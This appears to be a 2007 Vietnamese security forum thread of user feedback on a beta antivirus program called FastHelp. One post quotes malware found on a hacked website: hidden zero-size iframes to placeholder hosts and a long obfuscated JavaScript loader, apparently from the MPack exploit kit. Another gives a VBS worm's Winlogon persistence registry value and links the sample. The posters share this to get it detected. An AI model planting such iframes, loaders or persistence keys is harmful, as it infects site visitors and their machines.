Thử nghiệm chương trình diệt Virus mới

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

Thử nghiệm chương trình diệt Virus mới

[Question] Thử nghiệm chương trình diệt Virus mới	15/07/2007 01:49:54 (+0700) \| #181 \| 71217

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Mới mở mail ỳa hố ra coi, thấy liền một cái mail có link của tibs, quả là vắn số. Cái vụ này là phong trào rồi, kể từ khi nhận được con tibs đầu tiên.

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...

[Question] Thử nghiệm chương trình diệt Virus mới	26/07/2007 22:06:54 (+0700) \| #182 \| 74036

nlfb
Journalist

Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline

Hix em lại gặp vấn đề với FH rồi, sáng nay vô mở máy thì FH bảo cập nhật, thế nhưng bị treo, phải khởi động lại (2 lần). Em nghĩ là anh Hoàng nên làm 1 bản update offline (kiểu như của Symantec á), trong đó tổng hợp các update từ trước đến nay, vì đâu phải ai cũng có internet. smilie

)

[Question] Thử nghiệm chương trình diệt Virus mới	27/07/2007 10:59:18 (+0700) \| #183 \| 74210

Bí Danh NJ
Member

Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline

MOD Hoàng ơi.
Cái Soft chạy ổn - quyét rất đc việc - Có điều nó quyét chương trình chạy lâu quá - Ngồi chờ nó mỏi cổ mà quyét chưa xong để chạy Game.Bỏ nó đi Game chạy tốt.Hic,pác kiếm cách nào nó bóp cổ nhẹ nhẹ một tí chứ bóp kiểu này tịt luôn quá smilie

(

[Question] Thử nghiệm chương trình diệt Virus mới	27/07/2007 11:53:14 (+0700) \| #184 \| 74233

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

@nolateforbegin:L Chỉ cần chép đè file Data.dat lên là đủ, chỉ khi nào upgrade kernel thì mới cần cài lại thôi smilie

@Bí Danh NJ: Theo thử nghiệm của Hoàng thì chương trình quét nhanh hơn BKAV mà T.A ? Chỉ có điều là nếu cần chạy các game như Boom, PTV gì đó thì nên exit trước khi chạy. Đang kiếm cách khắc phục lỗi này đây smilie

[Question] Re: Thử nghiệm chương trình diệt Virus mới	27/07/2007 12:31:09 (+0700) \| #185 \| 74246

KyNam
Member

Joined: 15/07/2007 01:37:35
Messages: 74
Offline

chào LeVuHoang , muốn dùng thử mà không cài được :
Code:

Runtime error (at 1:624):
SWbemObjectEx : the service cannot be started

thử đổi priority thành thấp để chạy được trong lúc các chương trình khác đang chạy

[Question] Thử nghiệm chương trình diệt Virus mới	27/07/2007 13:33:14 (+0700) \| #186 \| 74254

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

hi KyNam,
Hoàng đã test từ WinMe -> WinVista nhưng chưa gặp lỗi như bạn nói và cũng không có sử dụng service nào mang tên SWbemObjectEx.

Còn về priority thì đã sử dụng thread nên các tiến trình khác vẫn hoạt động bình thường.

[Question] Re: Thử nghiệm chương trình diệt Virus mới	27/07/2007 20:47:35 (+0700) \| #187 \| 74286

KyNam
Member

Joined: 15/07/2007 01:37:35
Messages: 74
Offline

thử cài trên win xp thì được
chắc là lỗi của innosetup

[Question] Thử nghiệm chương trình diệt Virus mới	28/07/2007 05:51:24 (+0700) \| #188 \| 74471

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

biết lỗi rồi, đó là do Windows 2k và 2k3 không có System Restore thì phải. Hoàng sẽ bỏ chức năng này ở version sau. Thank KyNam smilie

[Question] Re: Thử nghiệm chương trình diệt Virus mới	28/07/2007 06:29:38 (+0700) \| #189 \| 74480

doikengheo
HVA Friend

Joined: 31/05/2005 05:51:51
Messages: 486
Location: Đâu nhỉ?
Offline

Lão Hoàng coi lại chứ khi cài Fasthelp thì không chạy được bản update của vỏ lâm truyền kỳ á

Đi một ngày đàng học một sàng dại

Sàng đi sàng lại lấy một tí khôn

http://vietload.com
kho phần mềm trực tuyến

[Question] Thử nghiệm chương trình diệt Virus mới	28/07/2007 06:52:16 (+0700) \| #190 \| 74484

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

lạ thật, sao nó toàn gặp rắc rối với mấy cái game smilie

). Giải pháp tạm thời là exit chương trình rồi chạy game lên smilie

[Question] Re: Thử nghiệm chương trình diệt Virus mới	28/07/2007 10:29:14 (+0700) \| #191 \| 74527

vnn1980
Member

Joined: 14/05/2007 16:42:30
Messages: 12
Offline

Con này dùng cũng được lắm. làm thế nào mà tụ độngáyấy dữ liệu từ các trang trực tuyến thì tốt

[Question] Thử nghiệm chương trình diệt Virus mới	28/07/2007 14:03:53 (+0700) \| #192 \| 74598

Bí Danh NJ
Member

Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline

Tạm thời trong thời gian chờ đợi MOD Hoàng Update cái bản khác test game nhẹ nhẹ hơn smilie

) yêu cầu anh em đọc kỹ hướng dẫn sử dụng : NHỚ TẮT CHƯƠNG TRÌNH TRƯỚC KHI CHẠY GAME - BẬT LẠI KHI VÀO WEB ĐEN smilie

(

[Question] Thử nghiệm chương trình diệt Virus mới	31/07/2007 07:26:53 (+0700) \| #193 \| 75193

bgate
Member

Joined: 18/06/2007 16:33:29
Messages: 21
Offline

hic anh Hoàng ơi chiều này máy nhà em update cái Fasthelp và quét,được một lúc thì nó báo lỗi:"external exception C0000024".
ah,còn 1 vấn đề nữa là hồi đầu khi cài fasthelp nếu bật bitdefender 10 thì không cài được còn nếu tắt đi thì cài được

[Question] Thử nghiệm chương trình diệt Virus mới	02/08/2007 05:09:12 (+0700) \| #194 \| 75856

Bí Danh NJ
Member

Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline

Giống như là chế độ ưu tiên khi cài đặt.Tắt hết các chương trình có khả năng scan đi thì mới cài đc. smilie

)
Mod Hoàng mới nhận một số dự án mới và đang gấp rút hoàn thành bản mới của Lion nên trả lời hơi lâu thì phải, có gì anh em thông cảm smilie

)

[Question] Re: Thử nghiệm chương trình diệt Virus mới	02/08/2007 11:40:31 (+0700) \| #195 \| 76003

MH
Member

Joined: 15/04/2007 00:16:17
Messages: 10
Offline

Anh Hoàng ơi, thế cái FH này nó disable hết tất cả các file Autorun.inf à? Em nhét cái đĩa CD vào nhưng chả autorun được, đành exit cái FH đi.

Mà mấy hôm nay em update mãi vẫn 5.3.4. Có lỗi gì ko anh? Hay anh chưa upgrade?

[Question] Re: Thử nghiệm chương trình diệt Virus mới	02/08/2007 12:09:24 (+0700) \| #196 \| 76022

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Chào mod Hoàng, tình cờ tui chui vào cái diễn đàn DDTH.com tả pín lù. Tui thấy có người hỏi về trang web cá nhân của họ bị dính một cái đoạn code, đại loại như

<iframe src='http://xxx.yyy.zzz.aaa/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Sau đó tui lại tò mò download từ từ các file .php từ cái địa chỉ xyz đó về máy để coi thử nội dung, tui lại thấy một file index.php có nội dung

<iframe src="http://bbb.ccc.ddd.eee/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Tiếp tục download tiếp cái file go.php đó ra coi, tui thấy một file index.php khác có chứa một dòng mã, mà tui đã thấy qua 1 lần.

<script language=JavaScript>function decipher(x)var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,8,55,5,58,30,38,22,7,29,0,0,0,0,0,0,37,59,23,2,56,13,60,15,39,11,36,21,32,62,9,53,52,10,48,34,49,6,45,35,27,12,3,0,0,0,0,31,0,0,1,50,43,42,16,28,41,4,61,24,25,40,17,54,19,57,26,47,46,14,51,44,18,20,33);for(j=Math.ceil(l/b);j>0;j--)r='';for(i=Math.min(l,b);i>0;i--,l--)w|=(t[x.charCodeAt(p++)-48])<<s;if(s)r+=String.fromCharCode(165^w&255);w>>=8;s-=2elses=6document.write(r)decipher("3S4dlo5FmHM6mMr6VZuqzsNes6lFw8_4LslDaWwc37ETCZg6QUGATHuDXS4dlekALp5DXS4dl5t4zv_z78E2NZY68UYv7B9civjHIdFca_D6mMQes6NTKB9ca89zi_VTEvFPaWqzE89PK0hSQoN@IcNJIxlJgtD@xemcn2wS1X9@7xN@IMYTB_kzUdgRa_YT7ZY68ogPnBjHQekHyt1Hft1@ncqSBQhSQ89v87mTQ8YRk5kFiAYRO_EvpvgcaIYR7smTNpwO7_kzxvgRn2Y6y7kzEZYvC2gPkxq6mMr6KpFOiWgzIpYcaWqzmdgRfHYROpgPE_kzppgcfZY68ogPnBjHQekHyt1Hft1@ncqSBQhSQ89vQQYRnskOEBV6QB9Pk6wci8FzXS4dle1TKB9ca8j6mMQes6lDwG_zY8Y685GR1dgPad_AQX9P8tlvn89O_emS9xqSgCqSyUNHI5hJQegPEdmRa8jSK2gOregOnWlcQpgRlekDwG06mMQes6hj6_GAO8_zNpFcCZETCZY68u0qoXFOYB9P8tNes7kz3S4d37kz37kz6dFc789z7XjRWdM4TXG6B7Nes7kz37kz37kz37kz3S4d37kz37kzzvYc37mc28tjmMrz37kz37kDYWgz3eg0mH5AT8_jmMrz37kz37kDYWgz3eFDodues7kz37kz3Uuv1BkzQIsjEZgcNW4d37kz37kzzvYc37mco2YRNHYqKB9zmMrz37kz371es7kz37kz3Uuv1BkzcvFczvFOmMrz37kz37kDYWgz3C52asuT1ZYes7kz37kz3Uuv1BkzjW54HdgRgW4d37kz37kzzvYc37kjNZVRYsFDYHYRmMrz37kz37kDYWgz3rFqg8ERmMrz37kz37kDYWgz3eMTGsuT1ZYes7kz37kz3Uuv1Bkze_FvO_VcCW4dmMrz37kz37kDYWgz3SuP78ED9ZwTf8ERbW4dmMrz371AZBDciGEvCpgPQ_jSiB9OdpYcaWqzmvwTBdwOQGgP3cMcnZFOIZgP3C52KHwcBZFO87kFEZFcmMQes7kz37kz3SuP78ED9ZwTf8ERbB1637lzmMQes7kz37kz3StcbZ9cad_ji89vk5GR1dgPad_AQX9PIcFcIZFOTZg2nW4d37kz37kzcvFceXG6SZgP4IGvId0Fa_VOYdFcmMrz371es7kz37kz3rGRNZwTnBmqiXER3QGvIdtj3S4d37kz37kz37kz37kz3ruT7Zgz8cNJ871es7kz37kz37kz37kz37kz3714fX9PL2ERUZ9Pa8Y6yS4d37kz37kz37kz37kz3ruT7Zgz8t5F8S4d37kz37kz37kz37kz37kz3SuP78ED9ZwTf8ERbWN@mMrz37kz37kz37kz37kz6pwOaBDzgoqzmMrz37kz37kz37kz37kz37kzmZVOnZ52aXYPnZgRkxNes7kz37kz37kz37kz37mqiXER3514L_1es7kz37kz37kz37kz37kz3714fX9PL2ERUZ9Pa8Y6yS4d37kz37kz37kz37kz3ruT7ZgzLHwOaW4d37kz37kz37kz37kz37kz3SuP78ED9ZwTf8ERbWl@37kzmMrz37kz371DI8gzoZgcaXgPmMrz3S4d37kz37kzwGgz3SuP78ED9ZwTf8ERbWN@3U_vasYes7kz37kz37kz37kz2pFcbdYcY0ERmMQes7kz37kz37kz37kzL2ERdpYcaWhDasYRBpgPasuT1ZgWYS4d37kz37kz37kz371D9ZF4iWYRkC52asuT1ZgzZ7DzICg2a_1es71es7kz37kz37kz37kzoZgP37mc28tjkUwcUZEcasgPIrFOapgPaZ5caWYRI89W8eFTGZwTn_1W3S4d37kz37kz37kz37mc28tjIrERnp5Pn_Ev8Z9PaBDzY8FzN5mc28tj8S4d37kz37kz37kz37mc28tjIrERnp5Pn_Ev8Z9PaBDzUHYT7XEvb_kS8rgc7vgR_55DguhqfCqJ1uNJJXNSyxlDKS1H9rNq17l@6BlJWXM@gCt@p51es7kz37kz3S4d37kz37kz37kz37mja89zQX_vaHgcJB9O3SlzQ__DosmqBZYTnZw480YRU89W8r_vaHgcIx5OKHYvUpgPYdFc86Dz8c1es7kz37kz37kz37kzoZgP3eFDQHgRa_9zk7mco2YRNHYqKBjSdpYcaX_OiXYRErVOZGt4d8sjYS4d37kz37kz37kz37mja89zQGtcN8YRBv5PaWY6QGtcN8YRBskji_VOasuT1ZgW8rG21_wcNskPnGFzYS4d37kz37kz37kz37DDQsgP4BGTn2wM6dYcKdFcasgP7WhjKHYvn2mcWdgcbZFOw8ER1skji89vN5kM861Sy61@YS4d37kz37kz37kz37mFYsgDY_E63utcI8VMOpgPEdsqQWgOQsYRI8VOE7NW3ukz860z3ukz3utcI8VMOpgPEdsqQWgOQsYRI8VOExNW3ukz860zmMrz37kz37kz37kz3C52asuT1ZY6cvFczvFO3ukzL2ERdpYcaW4d37kz37kz37kz37kz37kz37kzmMrz37kz37kz37kz3eMTGsuT1ZY68SuvU_Vc7dFRn_1es7kz37kz37kz37kze_FvO_VcCWqzjW54V8_FO_1es7kz37kz37kz37kz7ZgP3eg0mH5AT8_j3Slz6_ERi8ERe_FvaXgPEeMTGsuT1ZgzZ7DzI5kzZ7m480gjBdwRYS4d37kz37kz37kz37DjapVMnv9OaWqzS_kzZ7DzL_kzZ7DzT_1es7kz37kz37kz37kzV8_FOXGR7XEvQsY6Q2G4h25FTB0SeBERI2DjapVMTv9OaH14Q8YPNZwMOpgPEHk@YS4d37kz37kz37kz37mcjW54V8_FOsmjasgREckzmMrz37kz37kz37kz3eMc3CMOBdFO35GR7ZEcaBD4a29PmMrz37kz37kz37kz3oG4h_tcbvE6Q2G4h25FTB0SBZwOKdFc7ZFqQ8Y2mMrzmMrz37kz37kz37kz3utjed0ciWYRk5mjU_EvK8EvIIFz3ukz8tDz3ukz8uuvNZwjgX9PaWw480YRU8jzmMrz37kz37kz37kz3rGRnBmcWXs4keFjzX0S6_ERi8ERe_FvaXgPEutjed0ciWYRN5DzYS4d37kz37kz37kz37mja89zOHYPCvFcWvgcaWhcWXs4IrMOapgPa8GR98jDYHYREC52asuT1ZgS3U0jRZuWmMrz37kz37kz37kz37_cfIYvIdsOY0ERk6uRI_5WjW54HdgRgv1esS4d37kz37kz37kz37DDQ_9zGWN@3Usc37_cfIYvIdsOY0ER3S4d37kz37kz37kz37kz37kz3rFqg8ERkSuvb_5WjW54HdgRgHDvNxNWmMrz37kz37kz37kz37kz37kzHv9PaXtcbZY6JXVTH2mTHv9Pav1es7kz37kz37kz37kz37kz37kjNZVRYsFDYHYRIQ0OY8EREr5vB2Dqg8ER6dgRav1WmMrz37kz37kz37kz3tuR98Ees7kz37kz37kz37kzOHYPCvFcWvgcasmqNdwOaW4d37kz37kz3S4d37kz37kz37kz37mja89z3ewFo2YRNHY6Q__DosmqBZYTnZw480YRU89W8QsjU_EvK8jSo2YRNHFzN5DzYS4d37kz37kz37kz37m4IB1DB_VcBBDjaXEP1ZgzdZg2nW4d37kz37kz37kz37mccX_vaHgcI5GPIBkWL2ERdpYcavkSy6DDJHtjLW4dmMrz37kz371DI8gzwGgzmMQes7kz3CMcbB1AZW4dmM4DfswTnvwcIBmDa8VMcvFc4GGRBXEvQsgWYS4dmMrz37kz3cuDpZFO7vwcIWqciGEvCpgPQ_jSiB9OvZFO7vwcIW4d37kz371AZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zgCqzY7k6X7k@37kFEZFcmMrz37kz37kz3QuRndsFYswMvZFO7vwcIWqzgCqzmMrz37kz3C5c7ZYAZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zd8_zn51W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck5D4T_1es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFc3cl23UqSg51W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck514L_1es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFcbdwP7B1H951W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck51H951es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFcbdwP7BD4TB1JI7qzY7k6X7k@37kFEZFcmMrz37kz37kz3QuRndsFYswMvZFO7vwcIWqzB4MzmMrz37kz3C5c7ZYAZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zd8_zft1@8ckzltlzK7kzT2YRIW4d37kz37kz37mDa8VMcvFc4GGRBXEvQsY68o_j8S4d37kz371DNXER3S4d37kz37kz37mDa8VMcvFc4GGRBXEvQsY68C0cuswcxsFzmMrz37kz3CMcbB1AZW4d37kz371esCMcbBDDfswTnvwcIW4dmM4DfswTnvwcIBmDasYRBpgPasuT1ZgWYS4dmMrz37kz35GTI8wc1suT1ZY6851es7kz37kzB_E6wsgPEoqW2sgRYS4d37kz371vuWl@mMrz37kz3UtcmMrz37kz37kz3cYvkcMcn2D@fMDjI8YWuchJmMrz37kz37kz35GTI8wc1suT1ZY62pFcbdYcdpYcaAmqE_9WYvYWmMrz37kz37kz3cwvkcwvuxNes7kz37kzhdwcKBmFEvgcaB1vuHqOBW4d37kz37mDasYRBpgPasuT1ZY62pFcbdYcdpYcaW4dmMQDI8gzWZjcU8EvQsYes7kz3S4dlemj6_GAO806mMr6Q5t4zv06mMr6Qo5FmHM6mMQ")</script>

Tới ngang đây, do giới hạn hiểu biết, tui không biết cái thông tin gì được lấy về từ một nơi nào đó trên internet .... Thông tin hack này từ lần trước khi hỏi mod về mpack, cách thức người tấn công sử dụng mpack nhét thêm vào source code của trang web....

Vậy mod có cải tiến chức năng của phần mềm FH để luột, ngăn không thực hiện cái đoạn code của mpack, cái đoạn code thực thi các index.php, go.php, ...
Các phần mềm diệt malware khác đều detect ra cái file index.php có chứa cái đoạn kinh dị trên.

Tui chưa tìm hiểu nhiều về lập trình,lập trình ngôn ngữ web, bà con và mod thông cảm.

[Question] Thử nghiệm chương trình diệt Virus mới	02/08/2007 14:52:31 (+0700) \| #197 \| 76070

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

bgate wrote:

hic anh Hoàng ơi chiều này máy nhà em update cái Fasthelp và quét,được một lúc thì nó báo lỗi:"external exception C0000024".
ah,còn 1 vấn đề nữa là hồi đầu khi cài fasthelp nếu bật bitdefender 10 thì không cài được còn nếu tắt đi thì cài được

Hoàng đã update lên bản 5.3.5, remove script System Restore nên sẽ work với máy bạn.

@Mr.Vampire: Tải bản 5.3.5 về rồi add nó vào Chứng thực lão smilie

.
@MH: Theo mặc định thì disable autorun, bạn có thể chỉnh lại bằng cách vào mục Cấu hình.
@tmd: Mỗi khi IE thực thi thì nó báo đó tmd smilie

.

to all: Phiên bản 5.3.5 đã có, bác bạn down về thử xem smilie

[Question] Thử nghiệm chương trình diệt Virus mới	02/08/2007 22:44:18 (+0700) \| #198 \| 76126

nlfb
Journalist

Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline

Hi, em tải về dùng bản 5.3.5 rồi nhưng có cái lỗi "kỳ kỳ" smilie

), thứ nhất là phải add updater của boom vào (cái này ko sao), nhưng em ghi CD 2 cái software xong chạy nó thì không được (chưa thử cái khác), nó chỉ hiện ra 1 cửa sổ explorer mới trỏ đến ổ CD nữa. Em đoán là do cái FH nên tắt thử thì chạy bình thường, hay là tại anh đặt sờ-cu-ri-ty hơi cao smilie

)

[Question] Thử nghiệm chương trình diệt Virus mới	03/08/2007 03:22:17 (+0700) \| #199 \| 76222

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

nolateforbegin wrote:

Hi, em tải về dùng bản 5.3.5 rồi nhưng có cái lỗi "kỳ kỳ" ), thứ nhất là phải add updater của boom vào (cái này ko sao), nhưng em ghi CD 2 cái software xong chạy nó thì không được (chưa thử cái khác), nó chỉ hiện ra 1 cửa sổ explorer mới trỏ đến ổ CD nữa. Em đoán là do cái FH nên tắt thử thì chạy bình thường, hay là tại anh đặt sờ-cu-ri-ty hơi cao )

Ah, là do trên đĩa CD của nolateforbegin có autorun.inf để tự chạy chứ gì ? nolateforbegin vào phần Cấu Hình, chọn mục Khi có một ứng dụng AutoPlay thực thi. Đặt lại chế độ cho phép hoặc hỏi người dùng mỗi khi autorun.inf được chạy.
Hoàng làm chức năng này để chống mấy loại malware lây qua đường flash drive. Khi gắn Flash Drive vào, nếu malware được thực thi thì chương trình sẽ báo.

[Question] Thử nghiệm chương trình diệt Virus mới	03/08/2007 12:41:57 (+0700) \| #200 \| 76388

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Mod nên hoang nên update luôn chức năng ngăn chạy các loại .js .vbs .reg .... nói chung các loại code thuộc nhóm script, registry value. Tui vừa thử chạy một cái code độc .vbs. Nó chạy tuốt luốt. May một cái là FH của mod để lại cái warn là có thay đổi tại registry key. Nên đặt ra warn cho các loại script này luôn.
Nó đây http://www.freefileupload.net/file.php?file=files/020807/1186072814/killVBS.rar

Y chang một loại worm bình thường, lây lan tè le qua usb. Loại .vbs này hiện tại nhiều lắm, chưa kể các loại .js... khác.
PS : cái key này nó thêm vào registry. FH của mod ghi nhận được.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=C:\WINDOWS\system32\userinit.exe, -> C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\killVBS.vbs

[Question] Thử nghiệm chương trình diệt Virus mới	03/08/2007 13:44:34 (+0700) \| #201 \| 76401

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

hmm... add vào db thì dĩ nhiên là chương trình sẽ nhận dạng được. Nhưng làm sao phân biêt được script nào là người dùng tạo và script nào là có hại hả tmd smilie

? Chẳng lẽ... cấm hết smilie

[Question] Thử nghiệm chương trình diệt Virus mới	03/08/2007 23:23:58 (+0700) \| #202 \| 76467

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Sao cái link của tmd Hoàng cố down từ hôm qua đến giờ mà cứ bị lỗi không down được.

[Question] Re: Thử nghiệm chương trình diệt Virus mới	04/08/2007 07:25:51 (+0700) \| #203 \| 76624

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Upload lại cái link, ý là mod nên cho hỏi yes,no khi user nào đó chạy script gi vào registry, hỏi yes/no có cho ghi cái gì đó vào registry không. Vụ này có thiệt hại đó. Nâng cao thôi, bình thường để mặt định là không hỏi.
http://w13.easy-share.com/2702441.html có pass

[Question] Thử nghiệm chương trình diệt Virus mới	05/08/2007 00:44:09 (+0700) \| #204 \| 76843

nlfb
Journalist

Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline

Hi anh, 2 cái đó không có autorun, em chép theo dạng nguyên 2 cái thư mục: 1 là share point designer từ file iso ra nên có file autorun trong đó, thư mục còn lại là Kingsoft Office, không có autorun, hổng hiểu smilie

(

[Question] Re: Thử nghiệm chương trình diệt Virus mới	05/08/2007 06:40:09 (+0700) \| #205 \| 76899

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Đúng là phải nhập code nhiều lần , nó mới cho download cái file.
http://www.freefileupload.net/file.php?file=files/040807/1186223983/killVBS.rar

[Question] Thử nghiệm chương trình diệt Virus mới	05/08/2007 12:14:09 (+0700) \| #206 \| 76947

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

nolateforbegin wrote:

Hi anh, 2 cái đó không có autorun, em chép theo dạng nguyên 2 cái thư mục: 1 là share point designer từ file iso ra nên có file autorun trong đó, thư mục còn lại là Kingsoft Office, không có autorun, hổng hiểu (

hi nolateforbegin,
Bạn thử tắt chế độ "Khi có một ứng dụng AutoRun" thực thi xem sao ? Nếu vẫn còn bị, bạn có thể upload file .iso đó lên không ? Nếu upload thì Hoàng sẽ setup 1 FTP cho bạn ?

[Question] Thử nghiệm chương trình diệt Virus mới	11/08/2007 22:51:19 (+0700) \| #207 \| 78430

YHT
Member

Joined: 21/04/2006 13:29:33
Messages: 173
Location: HCM
Offline

Anh Hoàng ơi,
Anh có thể thêm một tính năng AutoUpdate được không? Vì hiện tại nó có check những mỗi lần tải về lại hỏi người dùng, anh thêm một option cho nó tự down khỏi hỏi luôn nhé smilie

.
Vì triển khai một dàn mấy chục máy mà nó update lại hỏi thì hơi kẹt.
--YHT

[Question] Thử nghiệm chương trình diệt Virus mới	12/08/2007 05:27:21 (+0700) \| #208 \| 78488

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

ok, sẽ add smilie

. thank YHT

[Question] Re: Thử nghiệm chương trình diệt Virus mới	14/08/2007 05:47:09 (+0700) \| #209 \| 78699

NMH1505
Member

Joined: 03/08/2007 11:56:56
Messages: 6
Offline

Mình sử dụng rồi !! Xin cho phép nhận xét nhé :
1. Quét tốt một số loại Virus Việt Nam .
2. Chưa thể mơ lock những khóa tron registry : task Manager , Regedit , Msconfig ... ( Nếu thêm đc những chức năng này thì khá tốt ).
Nếu có thêm thông tin gì mình sẽ send mẫu cho !! xin ủng hộ 2 tay 2 chân ...

[Question] Thử nghiệm chương trình diệt Virus mới	14/08/2007 12:14:43 (+0700) \| #210 \| 78772

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

2. Chưa thể mơ lock những khóa tron registry : task Manager , Regedit , Msconfig ... ( Nếu thêm đc những chức năng này thì khá tốt ).

Có công cụ All Tools In One kèm theo đó bạn. Cho phép mở Task Manager, Regedit...
Đối với loại virus nào khoá Task Manager, Regedit... chương trình sẽ tự động unlock ra.

Nếu có thêm thông tin gì mình sẽ send mẫu cho !! xin ủng hộ 2 tay 2 chân ...

Thank bạn trước smilie

Go to:

Users currently in here
1 Anonymous